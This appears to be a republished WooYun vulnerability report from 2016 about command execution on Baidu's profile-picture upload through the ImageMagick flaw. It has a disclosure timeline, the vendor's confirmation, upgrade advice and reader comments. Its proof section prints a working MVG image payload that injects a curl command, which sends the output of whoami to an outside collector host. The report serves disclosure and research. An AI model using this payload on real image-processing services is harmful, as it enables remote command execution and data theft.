一张图片引发的血案百度某处命令执行

admin
admin
admin
140650
文章
117
评论
2017年5月1日06:24:24评论308 views字数 202阅读0分40秒阅读模式
摘要

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-06: 厂商已经确认,细节仅向厂商公开
2016-05-16: 细节向核心白帽子及相关领域专家公开
2016-05-26: 细节向普通白帽子公开
2016-06-05: 细节向实习白帽子公开
2016-06-20: 细节向公众公开

漏洞概要 关注数(126) 关注此漏洞

缺陷编号: WooYun-2016-205206

漏洞标题: 一张图片引发的血案百度某处命令执行

相关厂商: 百度

漏洞作者: CplusHua

提交时间: 2016-05-05 10:41

公开时间: 2016-06-20 18:00

漏洞类型: 命令执行

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

27人收藏

漏洞详情

披露状态:

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-06: 厂商已经确认,细节仅向厂商公开
2016-05-16: 细节向核心白帽子及相关领域专家公开
2016-05-26: 细节向普通白帽子公开
2016-06-05: 细节向实习白帽子公开
2016-06-20: 细节向公众公开

简要描述:

提交到百度SRC结果最后要绑定手机,绑定成功后写得东西都没了,而且百度SRC不支持https访问...... 用户体验太差了.只好提交到这来...

详细说明:

Imagic 执行了命令..

漏洞证明:

一张图片引发的血案百度某处命令执行

更改头像的地方http://www.baidu.com/p/setting/profile/portrait

一张图片引发的血案百度某处命令执行

上传个图片,这里用HawkEye进行数据收集(跟cloudeye是一样的好东西).

图片代码如下:

push graphic-context

viewbox 0 0 640 480

fill 'url(https://"|curl `whoami`.baidu.a.0.l00.win")'

pop graphic-context

获取数据如下:

一张图片引发的血案百度某处命令执行

一张图片引发的血案百度某处命令执行

如果感觉问题不严重可联系我,深入一下.你懂得.

修复方案:

理论上没有升级的子站点所有能上传图片进行二次渲染的地方调用了这个库就可以执行了.

官方已经出最新版本,可直接升级.

版权声明:转载请注明来源 CplusHua@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2016-05-06 17:59

厂商回复:

感谢您关注百度安全!

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-05-05 10:42 | D&G ( 普通白帽子 | Rank:780 漏洞数:158 | going)

    0

    imagemagick?

  2. 2016-05-05 11:09 | HackBraid 一张图片引发的血案百度某处命令执行 ( 核心白帽子 | Rank:1914 漏洞数:304 | 最近有人冒充该账号行骗,任何自称HackBrai...)

    0

    牛逼啊

  3. 2016-05-05 11:12 | hkAssassin ( 普通白帽子 | Rank:395 漏洞数:73 | 我是一只毛毛虫。)

    0

    估计是Imagemagick

  4. 2016-05-05 11:15 | j14n ( 普通白帽子 | Rank:2226 漏洞数:401 )

    0

    中华。。。

  5. 2016-05-05 11:25 | 随风的风 ( 普通白帽子 | Rank:259 漏洞数:96 | 微信公众号:233sec 不定期分享各种漏洞思...)

    0

    imagemagick的问题?

  6. 2016-05-05 11:26 | 开心一下1313 ( 实习白帽子 | Rank:77 漏洞数:27 | 喝口水,压压惊......)

    0

    百度主站,,,

  7. 2016-05-05 11:27 | D&G ( 普通白帽子 | Rank:780 漏洞数:158 | going)

    0

    @HackBraid 原来你是大V啊

  8. 2016-05-05 11:30 | scanf ( 核心白帽子 | Rank:1694 漏洞数:239 | 。)

    0

    牛逼

  9. 2016-05-05 12:09 | 0hey_boy0 ( 普通白帽子 | Rank:132 漏洞数:23 | balabala~)

    0

    Imagemagick

  10. 2016-05-05 12:18 | HackBraid 一张图片引发的血案百度某处命令执行 ( 核心白帽子 | Rank:1914 漏洞数:304 | 最近有人冒充该账号行骗,任何自称HackBrai...)

    0

    @D&G - -低调低调,好久没聊天了

  11. 2016-05-05 12:31 | byr5ec ( 路人 | Rank:10 漏洞数:2 | I'm pursuing all teh time 5h37|_!)

    1

    使用这个类库Imagemagick处理图片有哪些应用,wordpress /DZ?

  12. 2016-05-05 12:33 | 随风的风 ( 普通白帽子 | Rank:259 漏洞数:96 | 微信公众号:233sec 不定期分享各种漏洞思...)

    0

    @byr5ec http://mp.weixin.qq.com/s?__biz=MzA4MDMwMjQ3Mg==&mid=2651864831&idx=1&sn=e987537da27c2e5162d1e1b05e9a40c1&scene=2&srcid=05059Jkm9ETQnlTNxvfMCImC&from=timeline&isappinstalled=0#wechat_redirect 看介里

  13. 2016-05-05 12:35 | 荒废的腰子 ( 普通白帽子 | Rank:264 漏洞数:31 | bug is my best friend)

    0

    果然imagemagick

  14. 2016-05-05 13:34 | byr5ec ( 路人 | Rank:10 漏洞数:2 | I'm pursuing all teh time 5h37|_!)

    1

    @随风的风,如果修复的话,还不太好批量找出这个Imagemagick? php扩展默认没有。

  15. 2016-06-22 06:01 | 老实先生 ( 普通白帽子 | Rank:228 漏洞数:75 | 专业承揽工程刮大白,外墙涂料,外墙保温,...)

    0

    这个应该给钱

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin